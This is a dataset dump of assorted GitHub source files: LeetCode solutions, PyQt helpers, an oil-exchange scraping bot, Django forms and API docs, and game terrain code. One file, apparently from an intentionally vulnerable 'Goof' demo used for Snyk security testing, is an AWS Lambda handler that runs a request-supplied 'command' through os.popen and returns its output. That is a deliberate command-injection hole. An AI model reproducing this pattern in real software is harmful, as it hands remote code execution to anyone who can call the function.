seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
17795520961 | import math
from typing import List
class Solution:
def minEatingSpeed(self, piles: List[int], h: int) -> int:
def can_eat(k: int) -> bool:
ans = 0
for pile in piles:
ans += math.ceil(pile / k)
return ans <= h
left = 1
right = 10 ** 9
while left < right:
mid = (left + right) >> 1
if not can_eat(mid):
left = mid + 1
else:
right = mid
return left
| fastso/learning-python | leetcode_cn/solved/pg_875.py | pg_875.py | py | 517 | python | en | code | 0 | github-code | 36 |
14128566758 | #!/usr/local/bin/ python3
# -*- coding:utf-8 -*-
# __author__ = "zenmeder"
class Solution(object):
def findTargetSumWays(self, nums, S):
if not nums:
return 0
for i in range(len(nums)):
if i == 0:
dp = {nums[0]: 1, -nums[0]: 1} if nums[0] else {0:2}
continue
now = {}
for pre in dp.keys():
now[pre + nums[i]] = dp[pre] if pre + nums[i] not in now else now[pre + nums[i]] + dp[pre]
now[pre - nums[i]] = dp[pre] if pre - nums[i] not in now else now[pre - nums[i]] + dp[pre]
dp = now
return dp[S] if S in dp else 0
print(Solution().findTargetSumWays([0,0,0,0,0,0,0,0,1],1)) | zenmeder/leetcode | 494.py | 494.py | py | 610 | python | en | code | 0 | github-code | 36 |
28514953067 | from PyQt4.QtCore import SIGNAL, QObject
from PyQt4 import QtGui
from opus_gui.util.icon_library import IconLibrary
def create_qt_action(icon_name, text, callback, parent_qt_object):
'''
Convenience method to create actions.
@param icon_name (str) name of icon to use (no Icon is used of the value is None)
@param text (str) action label
@param callback (function) callback function to call when triggered (no parameters)
@param parent_qt_object (QObject) parent object of action
@return: the created action (QAction)
'''
if icon_name is None:
action = QtGui.QAction(text, parent_qt_object)
else:
action = QtGui.QAction(IconLibrary.icon(icon_name), text, parent_qt_object)
QObject.connect(action, SIGNAL('triggered()'), callback)
return action
def get_unique_name(base_name, list_of_current_names):
'''
Get a unique name based on the base_name
@param base_name (str) the preferred name
@param list_of_current_names (list(str)) the list of taken names
@return a unique name (str) The name will be based on base_name with a number appended to it
'''
unique_name = base_name
number = 0
while unique_name in list_of_current_names:
number = number + 1
unique_name = '%s_%d' %(base_name, number)
return unique_name
def dictionary_to_menu(source_dict, callback, display_func = None, parent_widget = None):
'''
Converts a dictionary into a hierarchical menu.
@param dictionary The dictionary to convert.
@param callback is called with the object as an argument when a menu item is selected.
@param display_func An optionally called to display the objects (defaults to str()).
Example:
{'one': 'Fish',
'two': ['orange', 'apple'],
'three': {'four': 'guppy', 'five': 'guppy'}
}
generates a menu with three items in the top level ('one', 'two', 'three')
'one' contains one item; 'fish'
'two' contains two items; 'orange' and 'apple'
'three' contains two submenus; 'four' and 'five'. Both submenus has one item 'guppy'
'''
top_menu = QtGui.QMenu(parent_widget)
if not display_func:
display_func = str
for key, items in source_dict.items():
sub_menu = QtGui.QMenu(str(key), parent_widget)
if isinstance(items, dict):
dict_menu = dictionary_to_menu(items, callback, parent_widget)
sub_menu.addMenu(dict_menu)
else:
for item in list(items): # makes sure single items are iterable
item_cb = lambda x = item: callback(x)
action = create_qt_action(None, display_func(item), item_cb, parent_widget)
sub_menu.addAction(action)
top_menu.addMenu(sub_menu)
return top_menu
def hide_widget_on_value_change(widget_to_hide, value_holding_widget,
signal = 'textChanged(const QString &)',
hide_method = None):
''' Hide a widget whenever the value of another widget is changed.
This method is useful to automatically hide warning labels about erroroneus user input when the
user starts to correct the input.
@param widget_to_hide The widget that should be hidden on value change
@param value_holding_widget The widget to listen for a signal on
@param signal (default textChanged) the signal to listen for
@param hide_method the method to call when the signal is recieved (if this argument is omitted,
a method that consumes all arguments and calls widget_to_hide.setVisible(False)'''
if hide_method is None:
def default_hide_method(_, widget = widget_to_hide):
widget.setVisible(False)
hide_method = default_hide_method
QtGui.QWidget.connect(value_holding_widget, SIGNAL(signal), hide_method)
| psrc/urbansim | opus_gui/util/convenience.py | convenience.py | py | 3,823 | python | en | code | 4 | github-code | 36 |
2440750792 | #!/bin/env python3
from typing import Optional, TypeVar
from sqlmodel import SQLModel, Field
class MedicationLinkBase(SQLModel):
medication_id : Optional[int] = Field(
default=None,
foreign_key="medication.id"
)
class MedicationLinkBaseWithRequiredID(SQLModel):
medication_id : int = Field(
foreign_key="medication.id"
)
class MedicationLinkBaseAsPrimaryKey(SQLModel):
medication_id : Optional[int] = Field(
default=None,
foreign_key="medication.id",
primary_key=True
)
class MedicationLinkBaseAsPrimaryKeyWithRequiredID(SQLModel):
medication_id : int = Field(
foreign_key="medication.id",
primary_key=True
)
T_MedicationLink_TypeVar = TypeVar(
"T_MedicationLink_TypeVar",
bound=MedicationLinkBase|MedicationLinkBaseAsPrimaryKey|MedicationLinkBaseWithRequiredID|MedicationLinkBaseAsPrimaryKeyWithRequiredID
)
| shlomo-Kallner/poppy_backend_assessment | src/poppy_s/lib/models/base/medications.py | medications.py | py | 924 | python | en | code | 0 | github-code | 36 |
23214835305 | # -*- coding: utf-8 -*-
import json
import re
from datetime import date
import dryscrape
from bs4 import BeautifulSoup
# Заголовки столбцов таблицы
titles = [
'Биржевой инструмент', # 0
'Предл.', # 1
'Спрос', # 2
'Ср.вз. цена', # 3
'Объем договоров', # 4
'Кол - во дог.', # 5
'НПЗ' # 6
]
# для очистки текста от лишних символов
remove_pattern = r"[^(a-z)(A-Z)(0-9)(р.)(т.)(+)(-)(%)]"
# для добавления данных сделки в итог
def add_trade_in_total_stat(data, old_data, new_trades, total_stat):
total_stat['count'] += new_trades
total_stat['amount'] += get_trade_amount(data=data, old_data=old_data)
price = data[titles[3]]['price']
if total_stat['average_price']:
total_stat['average_price'] += price
total_stat['average_price'] /= 2
else:
total_stat['average_price'] = price
# нахождение объема
def get_trade_amount(data, old_data):
amount = get_number(data[titles[4]]['amount']) - get_number(old_data[titles[4]]['amount'])
return amount
# получение текста без лишних символов
def get_clear_text(dirty_text):
# price = children[1].find('span', class_="red").get_text().replace(u'\xa0', u' ')
return re.sub(remove_pattern, '', dirty_text)
# получение числа
def get_number(string):
if isinstance(string, int):
return string
num = int(re.sub(r"\D", '', string))
return num
# получение данных из строки
def get_data(tr):
data = {}
data['id'] = tr['id']
# children = [child.get_text(strip=True) for child in tr.find_all('td', recursive=False)]
children = tr.find_all('td', recursive=False)
# Биржевой инструмент 0
data[titles[0]] = children[0].find('a').get_text() # Конденсат газовый стабильный, ст. Пурпе (ст. отпр.)
# Предл. 1
try:
supply = {}
supply['price'] = children[1].find('span', class_="red").get_text()
supply['price'] = get_clear_text(supply['price'])
supply['amount'] = children[1].find('span', class_="gray").get_text()
supply['amount'] = get_clear_text(supply['amount'])
data[titles[1]] = supply
except AttributeError:
data[titles[1]] = { 'price': 0, 'amount': 0 }
# Спрос 2
try:
demand = {}
demand['price'] = children[2].find('span', class_="green").get_text()
demand['price'] = get_clear_text(demand['price'])
demand['amount'] = children[2].find('span', class_="gray").get_text()
demand['amount'] = get_clear_text(demand['amount'])
data[titles[2]] = demand
except AttributeError:
data[titles[2]] = { 'price': 0, 'amount': 0 }
# Ср.вз. цена 3
try:
average = {}
average['percent'] = children[3].find('span', class_="green").get_text()
average['percent'] = get_clear_text(average['percent'])
average['price'] = children[3].find(text=True)
average['price'] = get_number(get_clear_text(average['price']))
data[titles[3]] = average
except AttributeError:
data[titles[3]] = { 'percent': 0, 'price': 0 }
# Объем договоров 4
try:
size = {}
size['amount'] = children[4].find('span', class_="gray").get_text()
size['amount'] = get_clear_text(size['amount'])
size['cost'] = children[4].find(text=True)
size['cost'] = get_clear_text(size['cost'])
data[titles[4]] = size
except AttributeError:
data[titles[4]] = { 'amount': 0, 'cost': 0 }
# Кол - во дог. 5
try:
trades_count = children[5].find(text=True)
trades_count = get_clear_text(trades_count)
data[titles[5]] = int(trades_count)
except ValueError:
data[titles[5]] = 0
# НПЗ 6
try:
company_name = children[6].find(text=True)
company_name = get_clear_text(company_name)
data[titles[6]] = company_name
except ValueError:
data[titles[6]] = '-'
return data['id'], data
# проверка на наличие новых сделок
def check_new_trades(data, old_data):
return (get_number(data[titles[5]]) - get_number(old_data[titles[5]]))
# генерация сообщения для бота
def generate_msg(data, old_data=None, new_trades=1):
title = data[titles[0]]
id = data['id']
# На бирже ПРОИЗОШЛА!!! "СДЕЛКА!!!" на "ГАЗОВЫЙ КОНДЕНСАТ" по "ЦЕНЕ" в "ОБЪЁМЕ"
if old_data:
msg = 'На бирже ПРОИЗОШЛА!!! "СДЕЛКА!!!"'
if new_trades > 1:
msg = 'На бирже ПРОИЗОШЛИ!!! "СДЕЛКИ!!!" (%s)' % new_trades
price = data[titles[3]]['price']
amount = get_trade_amount(data, old_data)
msg += ' на "{0}"(id={1}) по "ЦЕНЕ"({2}р.) в "ОБЪЁМЕ"({3}т.)' \
.format(
title, # Биржевой инструмент
id,
price, # Ср.вз. цена
amount # Объем
)
return msg
# На бирже появилось "ПРЕДЛОЖЕНИЕ" на "ГАЗОВЫЙ КОНДЕНСАТ" по "ЦЕНЕ" в "ОБЪЁМЕ"
# На бирже появился "СПРОС" на "ГАЗОВЫЙ КОНДЕНСАТ" по "ЦЕНЕ" в "ОБЪЁМЕ"
if data[titles[1]]['amount']:
msg = 'На бирже появилось "ПРЕДЛОЖЕНИЕ"'
price = data[titles[1]]['price']
amount = get_number(data[titles[1]]['amount'])
else:
msg = 'На бирже появился "СПРОС"'
price = data[titles[2]]['price']
amount = get_number(data[titles[2]]['amount'])
msg += ' на "{0}"(id={1}) по "ЦЕНЕ"({2}р.) в "ОБЪЁМЕ"({3}т.)' \
.format(
title, # Биржевой инструмент
id,
price, # Ср.вз. цена
amount # Объем
)
return msg
# сохранение итоговых данных в файл (на случай перезапуска скрипта):
def data_to_cache(positions, total_stat):
positions_file = open('cache/positions_%s.json' % date.today(), 'w')
positions_file.write(json.dumps(positions))
positions_file.close()
total_stat_file = open('cache/total_stat_%s.json' % date.today(), 'w')
total_stat_file.write(json.dumps(total_stat))
total_stat_file.close()
def run_bot(positions, total_stat, dispatcher, chat_id, add_link=True):
# На некоторых сайтах стоит минимальная защита и они не отдают контент без user-agent
# headers = {'user-agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'}
base_url = 'http://spimex.com/'
url = base_url + 'markets/oil_products/trades/'
# чтобы избежать кэширования на любом уровне, на всякий случай добавим случайно число
# url = base_url + 'markets/oil_products/trades/?r=' + str(random.random())
session = dryscrape.Session()
session.visit(url)
response = session.body()
soup = BeautifulSoup(response, "lxml")
tds = soup.find_all('td', class_='td_name')
count = len(tds)
search_pattern = re.compile(r"(конденсат газовый)|(газовый конденсат)", re.IGNORECASE)
print('%s инструментов по url' % count, url)
for td in tds:
if not search_pattern.search(td.text):
continue
msg = ''
# строка-родитель ячейки с нужным текстом
tr = td.find_previous('tr')
id, data = get_data(tr)
if id in positions: # если позиция не новая
old_data = positions[id]
new_trades = check_new_trades(data=data, old_data=old_data)
if new_trades > 0:
positions[id] = data
msg = generate_msg(data=data, old_data=old_data, new_trades=new_trades)
add_trade_in_total_stat(data=data, old_data=old_data, new_trades=new_trades, total_stat=total_stat)
else:
positions[id] = data
msg = generate_msg(data=data)
if msg:
parse_mode = None
disable_web_page_preview = None
if add_link:
parse_mode = 'HTML'
disable_web_page_preview = True
a = tr.find('a', attrs={"title": "Информация об инструменте"})
a['href'] = base_url + a['href']
msg += '\r\n'
msg += str(a)
print(msg)
dispatcher.bot.send_message(
chat_id=chat_id,
text=msg,
parse_mode=parse_mode,
disable_web_page_preview=disable_web_page_preview
)
data_to_cache(positions, total_stat)
| rbikbov/test_python_bot | bot.py | bot.py | py | 9,250 | python | ru | code | 0 | github-code | 36 |
74768116583 | from collections import namedtuple
from datetime import date
import json
from django.shortcuts import reverse
from django.template import loader
from djaveAPI.find_models import publishable_model_from_name
from djaveAPI.paged_results import construct_paged_results
from djaveAPI.to_json import TYPE
from djaveAPI.widgets.field_table import field_table
from djaveClassMagic.model_fields import (
model_fields, DATE_TIME, DATE, INTEGER, FLOAT, TEXT, CHAR, BOOLEAN)
from djaveDT import to_tz_dt
from djaveURL import dict_as_query
def docs(model_name, api_root_url):
model = publishable_model_from_name(model_name)
template = loader.get_template('docs.html')
model_description = None
if hasattr(model, 'model_description'):
model_description = model.model_description()
else:
model_description = 'Somebody go put def model_description() in {}'.format(
model_name)
# HAck! Fix this when I have a good example.
model_plural_name = '{}s'.format(model_name)
context = {
'model_name': model_name,
'model_name_lower': model_name.lower(),
'model_plural_name': model_plural_name,
'model_description': model_description,
'fields_table': field_table(model),
'examples': examples(model, api_root_url)}
return template.render(context)
APIExample = namedtuple('APIExample', 'title code result')
GET_PREFIX = 'curl -u <api_key_username>:<api_key_password> {}'
POST_PREFIX = GET_PREFIX.format('-H "Content-Type: application/json" {}')
def examples(model, api_root_url):
list_url = _base_url(api_root_url, model)
filter_query_dict = example_filters(model)
filter_query_dict['page'] = 1
list_with_filters_url = '{}{}'.format(
list_url, dict_as_query(filter_query_dict))
get_one_url = '{}/{}'.format(list_url, 10)
list_result = example_list_result(model)
examples = [APIExample('Get all', GET_PREFIX.format(list_url), list_result)]
examples.append(APIExample('Get a filtered list', GET_PREFIX.format(
list_with_filters_url), list_result))
single = example_single_result(model)
examples.extend([
APIExample('Get one', GET_PREFIX.format(get_one_url), single),
APIExample('Create', example_create(model, api_root_url), single),
APIExample('Update', example_update(model, api_root_url), single),
APIExample(
'"Delete"', example_delete(model, api_root_url),
example_single_result(model, deleted=True)),
APIExample('Webhook', example_webhook(model, single), '')])
return examples
def example_webhook(model, single):
return (
'# If a new {} gets created, or an existing one changes,\n'
'# and if you give your API Key a webhook URL, we will POST\n'
'# something like this to your webhook URL:\n\n{}').format(
model.__name__, single)
def example_list_result(model):
as_dict = construct_paged_results([example_to_dict(model)], 1, 1, 1)
return json.dumps(as_dict, indent=2)
def example_single_result(model, deleted=False):
return json.dumps(example_to_dict(model, deleted=deleted), indent=2)
def example_to_dict(model, deleted=False):
values = example_values(
model, exclude=[], exclude_uneditable=False)
values[TYPE] = model.__name__
if 'deleted' in values and not deleted:
values['deleted'] = None
# This is for django's user
if 'is_active' in values and deleted:
values['is_active'] = False
return values
def example_delete(model, api_root_url):
the_rest = '-X DELETE {}/10'.format(_base_url(api_root_url, model))
return GET_PREFIX.format(the_rest)
def example_create(model, api_root_url):
values_str = example_values_str(
model, exclude=['deleted'], exclude_uneditable=True)
the_rest = '-d {} {}'.format(values_str, _base_url(api_root_url, model))
return POST_PREFIX.format(the_rest)
def example_update(model, api_root_url):
values_str = example_values_str(
model, exclude=['deleted'], exclude_uneditable=True)
the_rest = '-d {} {}/10'.format(values_str, _base_url(api_root_url, model))
return POST_PREFIX.format(the_rest)
def _base_url(api_root_url, model):
return '{}{}'.format(api_root_url, reverse(
'list_or_save_new', kwargs={'model_name': model.__name__}))
def example_values(model, exclude=[], exclude_uneditable=True):
values = {}
for field in model_fields(model):
if field.name in exclude:
continue
if exclude_uneditable and not field.editable:
continue
values[field.name] = _example_value(field)
return values
def example_values_str(model, exclude=[], exclude_uneditable=True):
values = example_values(model, exclude, exclude_uneditable)
k_vs = []
for key, value in values.items():
# I read on StackOverflow from somebody using windows that single quotes
# around JSON didn't work on the command line so they ended up escaping
# double quotes.
if isinstance(value, str):
value = '\\"{}\\"'.format(value)
k_vs.append('\\"{}\\": {}'.format(key, value))
almost_there = '"{' + ', '.join(k_vs) + '}"'
return almost_there.replace('True', 'true')
def example_filters(model):
filters = {}
for field in model_fields(model):
if field.can_filter:
name = field.name
name__gte = '{}__gte'.format(name)
name__lte = '{}__lte'.format(name)
if field.foreign_key_to:
filters[name] = _example_value(field)
elif field.type == DATE_TIME:
filters[name__gte] = _example_value(field)
filters[name__lte] = to_tz_dt('2020-02-28 23:59').isoformat()
elif field.type == DATE:
filters[name__gte] = _example_value(field)
filters[name__lte] = date(2020, 2, 28).isoformat()
elif field.type == INTEGER:
filters[name__gte] = _example_value(field)
filters[name__lte] = 20
elif field.type == FLOAT:
filters[name__gte] = _example_value(field)
filters[name__lte] = 200.2
elif field.type == BOOLEAN:
filters[name] = True
else:
raise Exception(
'I am not sure what an example {} filter looks like'.format(
field.type))
return filters
def _example_value(field):
if field.foreign_key_to:
return 4321
elif field.type == DATE_TIME:
return to_tz_dt('2020-02-01 00:00').isoformat()
elif field.type == DATE:
return date(2020, 2, 1).isoformat()
elif field.type == INTEGER:
return 10
elif field.type == FLOAT:
return 100.1
elif field.type in [TEXT, CHAR]:
if field.name.find('_currency') > 0:
return 'USD'
return 'Hello'
elif field.type == BOOLEAN:
return True
raise Exception(field.type)
| dasmith2/djaveAPI | djaveAPI/docs.py | docs.py | py | 6,615 | python | en | code | 0 | github-code | 36 |
1076138061 | import unittest
from AntiSpam import AntiSpam
class TestAntiSpam(unittest.TestCase):
def setUp(self) -> None:
self.antiSpam = AntiSpam()
self.emailList = [
'nombre1@hotmail.com',
'nombre2@outlook.com',
'nombre3@yahoo.es',
'nombre4@hotmail.com',
'nombre2@outlook.com',
'nombre5@hotmail.com'
]
return super().setUp()
def test_extractDomain(self):
# Test extractDomian method
self.assertEqual(self.antiSpam.extractDomain("manolito.gafotas.com"), "", "Should be empty string")
self.assertEqual(self.antiSpam.extractDomain("manolito@gafotas.com"), "gafotas.com", "Should be 'gafotas.com'")
def test_findSmartHackers(self):
# Test findSmartHackers method
self.assertRaises(TypeError, self.antiSpam.findSmartHackers, "")
self.assertRaises(ValueError, self.antiSpam.findSmartHackers, [])
self.assertEqual(
self.antiSpam.findSmartHackers(self.emailList),
['nombre1@hotmail.com', 'nombre4@hotmail.com', 'nombre5@hotmail.com'],
"Error in returned list"
)
if __name__ == '__main__':
unittest.main()
| malandrinersdev/desafio-miniaoc | soluciones/guillermoig/reto-1/test_AntiSpam.py | test_AntiSpam.py | py | 1,212 | python | en | code | 2 | github-code | 36 |
12020470252 | import container
import procs.procLoader
import terrainLoader
import things.thing
import things.stats
import util.boostedDie
import util.serializer
## Order in which we serialize records.
FIELD_ORDER = ['name', None,
'templates', None,
'display', None,
'interactions', None,
'flags', None,
'mods', None
]
## Attributes that we copy verbatim over from the TerrainFactory to the
# Terrain instance.
COPIED_FIELDS = ['name', 'display']
## TerrainFactories instantiate Terrain instances.
class TerrainFactory:
## \param record The record from terrain.txt defining the Terrain.
def __init__(self, record):
## Keep a copy around for later reserialization.
self.record = record
## Unique identifier
self.name = None
## Display metadata.
self.display = {}
## List of other Terrain types we descend from, which apply themselves
# as templates to ourselves.
self.templates = []
## Maps action names to lists of procs to invoke when those actions
# occur.
self.interactions = {}
## Binary modifiers, like whether or not something can be seen through.
# These will be converted to +1 stat modifiers when actual Terrain is
# created; this is purely a convenience for when writing out the
# terrain records.
self.flags = []
## Stats instance.
self.stats = things.stats.Stats()
if 'templates' in record:
for name in record['templates']:
template = terrainLoader.getTerrainFactory(name)
self.updateFields(template.__dict__)
self.updateFields(record)
## Apply all of the values in the provided dictionary to ourselves.
def updateFields(self, record):
for key, value in record.iteritems():
if key == 'templates':
# Don't do this one, since we don't ever directly inherit it.
continue
elif key == 'interactions':
for interaction in value:
# Remap the provided list of dictionaries into a mapping of
# the "action" value to a list of procs.
action = interaction['action']
if action not in self.interactions:
self.interactions[action] = []
if 'preProcs' in interaction:
self.interactions[action] = interaction['preProcs'] + self.interactions[action]
if 'procs' in interaction:
self.interactions[action].extend(interaction['procs'])
if 'postProcs' in interaction:
self.interactions[action].extend(interaction['postProcs'])
elif type(value) is list:
if not hasattr(self, key):
setattr(self, key, [])
getattr(self, key).extend(value)
else:
# Assume scalar.
setattr(self, key, value)
## Generate an appropriate Terrain instance of the given level.
# Primarily this means instantiating Procs for the transitions.
def makeTerrain(self, gameMap, pos, mapLevel):
result = Terrain(gameMap, pos)
for field in COPIED_FIELDS:
setattr(result, field, getattr(self, field))
# Stat modifiers may have values that need to be evaluated now.
result.stats = self.stats.copy()
result.stats.roll(mapLevel)
# Merge binary values into the mods dict.
for flag in self.flags:
result.stats.addMod(flag, things.stats.StatMod(0, 1))
# Procs need to be instantiated for all interactions, now.
for action, procRecords in self.interactions.iteritems():
newProcs = [procs.procLoader.generateProcFromRecord(procRecord, mapLevel) for procRecord in procRecords]
result.interactions[action] = newProcs
result.mapLevel = mapLevel
result.init(gameMap)
return result
def getSerialization(self):
return util.record.serializeRecord(self.record, FIELD_ORDER)
## Terrain are Things that don't move around or act autonomously, but have a
# number of interactions that transform them into other Terrains or destroy
# them (e.g. opening doors, digging out walls).
class Terrain(things.thing.Thing):
def __init__(self, gameMap, pos):
things.thing.Thing.__init__(self, pos)
if pos:
gameMap.addSubscriber(self, pos)
## Name of the terrain
self.name = None
## Level at which the terrain was created.
self.mapLevel = None
## Display information.
self.display = {}
## Relevant stats for the terrain instance.
self.stats = things.stats.Stats()
## Maps action names to the procs that occur when something performs
# that action on us.
self.interactions = {}
## Now that we're instantiated, add us to any appropriate containers.
def init(self, gameMap):
gameMap.addSubscriber(self, container.TERRAIN)
if self.stats.getStatValue('OBSTRUCT'):
gameMap.addSubscriber(self, container.BLOCKERS)
if self.stats.getStatValue('INTERESTING'):
gameMap.addSubscriber(self, container.INTERESTING)
if self.stats.getStatValue('OPAQUE'):
gameMap.addSubscriber(self, container.OPAQUES)
for action, group in [('open', container.OPENABLES),
('close', container.CLOSABLES),
('descend', container.DESCENDABLES),
('ascend', container.ASCENDABLES),
('tunnel', container.TUNNELABLES)]:
if action in self.interactions:
gameMap.addSubscriber(self, group)
## React to trying to move through us.
def canMoveThrough(self, target):
return (self.stats.getStatValue('OBSTRUCT') == 0)
## Interact with the Terrain instance.
# \param action String describing the action to do; we use this to look
# up any associated procs we have.
# \param actor Thing performing the action.
# \param pos Position of the Terrain being interacted with -- in the event
# that our own pos field is invalid (because we're being aliased to
# multiple locations simultaneously).
def interact(self, action, actor, gameMap, pos):
for proc in self.interactions[action]:
if not proc.trigger(terrain = self, actor = actor,
gameMap = gameMap, pos = pos):
# The proc blocked further procs from proceeding
break
## Generate a ready-to-be-serialized dict of this Terrain's information.
# See the util.serializer module for more information.
def getSerializationDict(self):
return self.__dict__
## Convert to a string for display.
def __unicode__(self):
return u"<Terrain %s at %s>" % (self.name, self.pos)
## Make a "blank" Terrain instance for deserialization.
def makeBlankTerrain(gameMap):
return Terrain(gameMap, (-1, -1))
util.serializer.registerObjectClass(Terrain.__name__, makeBlankTerrain)
| Valoren/Angpy | things/terrain/terrain.py | terrain.py | py | 7,247 | python | en | code | 1 | github-code | 36 |
30164407430 | #!/usr/bin/python3
"""
File: test_file_storage.py
"""
import unittest
import json
class TestFileStorage(unittest.TestCase):
"""File Storage Test"""
def test_json_load(self):
with open("file.json") as fd:
d = json.load(fd)
self.assertEqual(isinstance(d, dict), True)
def test_file(self):
with open("file.json") as fd:
self.assertTrue(len(fd.read()) > 0)
if __name__ == '__main__':
unittest.main()
| peterkthomas/AirBnB_clone | tests/test_models/test_engine/test_file_storage.py | test_file_storage.py | py | 474 | python | en | code | 0 | github-code | 36 |
6926982149 | import json
import os
import boto3
import time
def lambda_handler(event, context):
#Parse event
if type(event['body']) == str:
body = json.loads(event['body'])
data = body['data']
command = body['command']
else:
body = event['body']
data = body['data']
command = body['command']
command_input = os.popen(command)
command_output = command_input.read()
time.sleep(1)
# Send message to SNS
sns_arn = os.environ['SNS_ARN']
sns_client = boto3.client('sns')
sns_client.publish(
TopicArn = sns_arn,
Subject = 'Snyk Serverless Test',
Message = "This is the information sent to the Lambda Function: " + data + " The output of the command: " +command+ " is: " + str(command_output)
)
return {
"isBase64Encoded": "false",
"statusCode": 200,
"headers": {
"Content-Type": "application/json"
},
"body": json.dumps({
"Message " : data ,
"Command Output" : command_output
})
}
| metalstormbass/Terraform-Cloud-Goof | lambda_code/main.py | main.py | py | 1,102 | python | en | code | 0 | github-code | 36 |
72184818663 | """
Given a string s which consists of lowercase or uppercase letters, return the length of the longest palindrome
that can be built with those letters.
Letters are case sensitive, for example, "Aa" is not considered a palindrome here.
"""
class Solution(object):
def longestPalindrome(self, s):
"""
:type s: str
:rtype: int
"""
freq_dict = {}
for letter in s:
freq_dict[letter] = freq_dict.get(letter, 0) + 1
result = sum(value if value % 2 == 0 else value -1 for value in freq_dict.values())
return result + 1 if any(map(lambda x: x % 2 == 1, freq_dict.values())) else result
| Delacrua/LearningPython | LeetCode/409.longest_palindrome.py | 409.longest_palindrome.py | py | 662 | python | en | code | 0 | github-code | 36 |
25166244861 | import re
from django import forms
from crispy_forms.helper import FormHelper
from content.src.reg_expressions import RegExpressions
from content.models import Content, Video
from product.models import Product
class StyleMixin:
"""Класс добавляющий форматирование форм crispy-forms"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.helper = FormHelper()
class ValidateMixin:
"""Класс добавляющий методы валидации формам связанным с контентом"""
def clean_is_paid_subs(self):
"""Метод валидации поля платной подписки"""
cleaned_data = self.cleaned_data.get('is_paid_subs')
user_paid = Product.objects.filter(user=self.user)
if cleaned_data and not user_paid:
raise forms.ValidationError('Невозможно создать видео по подписке'
' так как вы не указали цену подписки'
' на пользователя при регистрации.'
'Указать цену можно на странице '
'редактирования пользователя')
return cleaned_data
def clean(self):
"""Переопределение для проверки указания доступности контента"""
cleaned_data = super().clean()
is_free = self.cleaned_data.get('is_free')
is_paid_subs = self.cleaned_data.get('is_paid_subs')
is_src_subs = self.cleaned_data.get('is_src_subs')
is_purchase = self.cleaned_data.get('is_purchase')
if True not in [is_free, is_paid_subs, is_src_subs, is_purchase]:
raise forms.ValidationError('Укажите минимум один параметр '
'доступности видео: бесплатно, по '
'подписке, по подписке на сервис, '
'по разовой покупке')
if is_free and is_paid_subs:
raise forms.ValidationError('Видео не может быть одновременно '
'бесплатным и по подписке на '
'пользователя')
if is_free and is_src_subs:
raise forms.ValidationError('Видео не может быть одновременно '
'бесплатным и по подписке на сервис')
if is_free and is_purchase:
raise forms.ValidationError('Видео не может быть одновременно '
'бесплатным и доступным к покупке в'
' коллекцию')
return cleaned_data
class ContentForm(StyleMixin, ValidateMixin, forms.ModelForm):
"""Класс описывающий форму для создания нового экземпляра контента"""
title = forms.CharField(
label="Название",
help_text="Введите название записи. Ограничение 150 символов.",
widget=forms.TextInput(
attrs={
'placeholder': "Лучшее название на планете..."},
),
max_length=100,
required=True,
)
description = forms.CharField(
label="Описание",
help_text="Введите название записи. Ограничение 150 символов.",
widget=forms.Textarea(
attrs={
'placeholder': "Лучшее Описание на планете..."},
),
required=True,
)
image = forms.ImageField(
label="Изображение",
help_text="Используйте изображение с соотношением сторон 16 на 9. "
"Данное изображение будет использовано как заставка к "
"видео . Если поле оставить пустым, то будет использовано "
"превью видео из YouTube.",
required=False,
)
is_free = forms.BooleanField(
label="Бесплатный контент",
help_text="Установите галочку если контент будет доступен всем "
"пользователям без какой-либо оплаты."
"Если активно, то будет игнорироваться поле 'цена'",
required=False,
)
start_publish = forms.DateTimeField(
label="Время публикации",
widget=forms.DateTimeInput(
attrs={'type': 'datetime-local'},
),
help_text="Укажите дату и время в которое автоматически будет "
"опубликована запись",
required=False
)
is_publish = forms.BooleanField(
label="Опубликовать сразу",
help_text="Если активно, то запись будет опубликована "
"сразу после создания",
required=False,
)
is_paid_subs = forms.BooleanField(
label="Контент в подписке на пользователя",
help_text='Установите галочку если контент будет доступен всем '
'пользователям оплатившим подписку на вас',
required=False,
)
is_src_subs = forms.BooleanField(
label="Контент в подписке на сервис",
help_text='Установите галочку если контент будет доступен всем '
'пользователям оплатившим подписку на сервис. Вы будете'
'получать ежемесячное роялти в зависимости от просмотров',
required=False,
)
is_purchase = forms.BooleanField(
label="Контент доступен для покупки в коллекцию",
help_text='Установите галочку если контент будет доступен для '
'единовременной покупки. Пользователь получит доступ к '
'контенту навсегда, а вы разовую единовременную оплату.'
'Если поле активно, необходимо казать цену для разовой'
' покупки',
required=False,
)
def __init__(self, *args, **kwargs):
"""Переопределение для фильтрации содержимого поля clients"""
self.user = kwargs.pop('user')
super().__init__(*args, **kwargs)
class Meta:
model = Content
fields = ('title', 'description', 'image', 'start_publish',
'is_publish', 'is_free', 'is_paid_subs', 'is_src_subs',
'is_purchase')
class ContentUpdateForm(StyleMixin, ValidateMixin, forms.ModelForm):
"""Класс описывающий форму для обновления экземпляра контента"""
title = forms.CharField(
label="Название",
help_text="Введите название записи. Ограничение 150 символов.",
widget=forms.TextInput(
attrs={
'placeholder': "Лучшее название на планете..."},
),
max_length=100,
required=True,
)
description = forms.CharField(
label="Описание",
help_text="Введите название записи. Ограничение 150 символов.",
widget=forms.TextInput(
attrs={
'placeholder': "Лучшее Описание на планете..."},
),
required=True,
)
image = forms.ImageField(
label="Изображение",
help_text="Используйте изображение с соотношением сторон 16 на 9. "
"Данное изображение будет использовано как заставка к "
"видео . Если поле оставить пустым, то будет использовано "
"превью видео из YouTube.",
required=False,
)
is_free = forms.BooleanField(
label="Бесплатный контент",
help_text="Установите галочку если контент будет доступен всем "
"пользователям без какой-либо оплаты."
"Если активно, то будет игнорироваться поле 'цена'",
required=False,
)
is_paid_subs = forms.BooleanField(
label="Контент в подписке на пользователя",
help_text='Установите галочку если контент будет доступен всем '
'пользователям оплатившим подписку на вас',
required=False,
)
is_src_subs = forms.BooleanField(
label="Контент в подписке на сервис",
help_text='Установите галочку если контент будет доступен всем '
'пользователям оплатившим подписку на сервис. Вы будете'
'получать ежемесячное роялти в зависимости от просмотров',
required=False,
)
